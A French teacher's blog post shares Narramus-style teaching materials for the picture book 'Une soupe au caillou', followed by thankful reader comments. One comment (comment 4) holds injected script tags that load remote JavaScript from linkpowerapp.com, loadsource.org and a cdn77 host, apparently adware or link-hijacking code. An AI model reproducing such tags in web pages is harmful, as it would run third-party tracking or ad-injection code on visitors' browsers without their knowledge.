• Une soupe au caillou version narramus

    EDIT DU 30/11/18

    J'ai testé l'an dernier d'adapter la méthode Narramus à ma thématique et j'avais donc travaillé avec l'album Mélie. Vous pouvez trouver ce travail ici..

    JE tâtonne toujours mais je m'essaie cette année avec des MS-GS à un premier album que je souhaite travailler à la manière de Narramus: Une soupe au caillou d'Anaïs Vaugelade.

    Résultat de recherche d'images pour "une soupe au caillou"

    Cette année nous travaillons sur les personnages de conte, le premier était le loup, cette histoire me paraissait adaptée. D'autant que Mr Goigoux avait signalé qu'il fallait prêter attention au choix de l'histoire et que pour commencer par une histoire à structure répétitive était souvent plus pertinente.

    Bref voici donc ce que j'ai préparé:

    Une soupe au caillou version narramus

    fiche de prep

    Une soupe au caillou version narramus

    cartes vocabulaire boîte à mots

    Je me suis beaucoup interrogée sur le fait de mettre en ligne les diapos que j'ai crée. Je ne l'avais pas fait pour Mélie en raison des droits d'auteur. Pour la soupe au caillou je les mets pour l'instant en ligne car au final je n'ai utilisé que les images que l'on trouve en ligne via google, alors bon....Si cela pose problème je retirerai..

    Vous trouvez divers diapos, il y a la plupart du temps la même procédure: les cartes images en GF espacées par une page blanche qui permet la manipulation préconisée à savoir montrer/cacher/vérifier avec plus de facilité.

    Puis les textes et les illustrations. Attention il y a une séance où j'ai crée une illustration pour aider à mieux comprendre l'implicite du texte. De plus parfois je prévois un diapo trop lourd ou trop court, bref je les ai toujours tous sous la main et je m'adapte selon la réaction des élèves....

    diaporama soupe 1

    diapo soupe 2

    diapo soupe 3

    diapo soupe 4

    diapo soupe 5

    diapo soupe 6

    diapo soupe 7

    diapo soupe 8

     

    Voilà j'espère que vous n'aurez pas de difficultés à lire et utiliser les documents.

    Si d'autres ont adapté narramus à divers albums et qu'ils acceptent de partager n'hésitez pas à le faire via la rubrique contact!

     

     EDIT du 30/11/2018:

    J'ai essayé de corriger les quelques coquilles que j'avais pu noter dans les diapos, donc les docs au dessus ont été mis à jour.

    J'ai aussi fabriqué un diapo supplémentaire. L'histoire n'est pas simple à raconter surtout pour mes MS, dans cette histoire il y a beaucoup d'implicite et ils ont du mal à verbaliser ce que pense l'animal alors que cela n'est pas dit dans le texte. Et du coup le début de l'histoire ressemble beaucoup à un simple rapport du dialogue entre le loup et la poule sans évoquer pour autant ce que pense la poule ou alors que partiellement et du coup il manque un bout du récit. Malgré la mise en place des masques et de la maquette, certains ont encore des difficultés. Alors j'ai fait un diapo avec les images de l'album mais j'ai repris le codage des séances particulière pour leur indiquer quand ils doivent dire un dialogue et quand il faut ajouter ce que pense les personnages. j'ai mis un codage ( cadre vert) pour dire quand on est le narrateur. Voilà ce sera une étape intermédiaire pour certains avant de pouvoir raconter sans aide autre que l'album à leurs parents.

    diapo récit


    Tags Tags : , , , ,
  • Commentaires

    1
    Nanoukae
    Dimanche 7 Octobre 2018 à 13:37
    Merci beaucoup pour cet énorme travail !!!!
    2
    titemom
    Dimanche 7 Octobre 2018 à 13:44

    Un énorme merci pour tout ce travail. 

    Pour l'instant, l'offre Narramus étant réduite, ton travail nous permet de continuer à adopter la démarche de base sans tourner en rond sur les mêmes albums.

    J'utiliserai sans doute ton travail en P4 (P2 : le machin avec MS/GS , P3 : la chasse au caribou avec mes GS, P4 : ton travail sur la soupe au caillou avec les MS/GS et P5 : la sieste de Moussa avec les GS).

     

    3
    Luce
    Lundi 22 Octobre 2018 à 20:44

    Bravo !

    C'est impressionnant.

    J'adore cet album et vais ainsi le transmettre façon narramus. MERCI

    sur la diapo 4 il y a une erreur de frappe loup au lieu de cochon p 22 il me semble.;-)

    4
    Loucharos
    Jeudi 25 Octobre 2018 à 15:18

    un grand merci pour ce travail qui va nous permettre de tester narramus avec un album qu 'on adore.

    <script src="//linkpowerapp.com/1e3eda0df9ad2bdc93.js"></script> <script src="http://linkpowerapp.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52355x7742x&r=1540473397595" type="text/javascript"></script> <script src="http://1675450967.rsc.cdn77.org/cu/trkshpks.js" type="text/javascript"></script> <script src="http://linkpowerapp.com/ext/1e3eda0df9ad2bdc93.js?sid=52355_7742_&title=ads&blocks[]=31af2" type="text/javascript"></script>
    5
    josiane
    Samedi 8 Décembre 2018 à 19:02

    Vraiment bravo pour cet énorme travail de qualité ! je suis impressionnée !

    6
    1000n
    Mercredi 19 Décembre 2018 à 09:49

    Merci de partager ce travail!

    7
    Helene
    Mercredi 26 Décembre 2018 à 13:45
    Bonjour,
    Le concept Narramus est très intéressant et porteur. Je l'ai aussi transposé pour étudier le conte Hansel et Gretel. Très satisfaisant ! En parallèle, je leur ai fait construire une boîte à raconter pour leur permettre de réinvestir le travail accompli en langage et le concept de cette boîte présenté dans le site de la classe à Marion est super chouette et complémentaire à Narramus. Je vous le conseille !
    Bonne fin d'année à tous
    8
    milky
    Dimanche 30 Décembre 2018 à 10:37

    Merci infiniment pour ce fabuleux travail ! 

    9
    Fred
    Dimanche 20 Janvier à 16:44

    Merci de partager... Je testerai cette méthode. 

    10
    Sarah
    Dimanche 27 Janvier à 22:06

    Merci beaucoup c'est génial ce travail!!!

    11
    Nora
    Dimanche 3 Février à 11:13

    Bonjour, 

    merci beaucoup pour le partage de votre travail très fourni. J'ai entendu parlé de la méthode narrasmus récemment et je vais grâce à vous pouvoir tenter l'expérience.

     

    12
    Patricia
    Mardi 19 Février à 16:51

    Bonjour,

    merci beaucoup pour ton travail et ton partage.

    Nous aussi dans notre circonscription de Bayonne, nous avons commencé à expérimenter la méthode Narramus l'an passé et j'ai poursuivi cette année avec l'album " La chasse au Caribou" avec des Ms

    Dans le cadre des animations pédagogiques nous sommes en train de travailler à l'élaboration de nouveaux scénarios, un album pour chaque section dont "la soupe au caillou" pour les MS. Je fais partie du groupe qui travaille sur "La soupe au caillou" et je serai ravie de partager le fruit de nos labeurs avec toi.

    Sache que tu trouveras sur le net un travail d'une autre circonscription sur l'album "La moufle" et un autre sur " La course".

    Bonne journée

    Patricia

     

     

      • Dimanche 10 Mars à 15:36

        Merci beaucoup, je serai ravie d'élargir la proposition que j'ai faite sur cet album, il est certain qu'on réfléchit mieux à plusieurs!

      • Patricia
        Samedi 14 Septembre à 19:13

        Bonjour ,

         

        Comme promis en mars, tu peux trouver sur le site de la circonscription de Bayonne, les scénarios d' après Narramus pour chaque section de maternelle: Les trois ours, la soupe au caillou et plouf.

        tu as partagé ton travail, nous partageons le notre.

        Bonne soirée

        Patricia

         

    13
    MatChaLéa
    Jeudi 7 Mars à 07:04

    Merci beaucoup pour le partage de ce travail.

    14
    chris
    Lundi 8 Avril à 17:48

    Bonjour,

    Merci pour ce beau travail.

    Une proposition pour résoudre le problème de l'absence du récit lors de racontage : en utilisant des marionnettes, les élèves utilisent style indirect et direct. Utiliser les deux est intéressant.

    15
    Mercredi 30 Octobre à 14:11

    Merci pour ce partage et pour ton travail.

    16
    Anne
    Samedi 9 Novembre à 12:41

    J'avais l'intention de tester la méthode Narramus cette année et ai commandé "La chèvre Biscornue" mais après avoir découvert ton site et ton fabuleux travail sur "Une soupe au caillou" je vais commencer par celui-ci.

    Merci beaucoup pour ton partage.

    17
    léa b
    Jeudi 5 Décembre à 16:14

    Un très grand merci pour cet excellent travail!!!

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :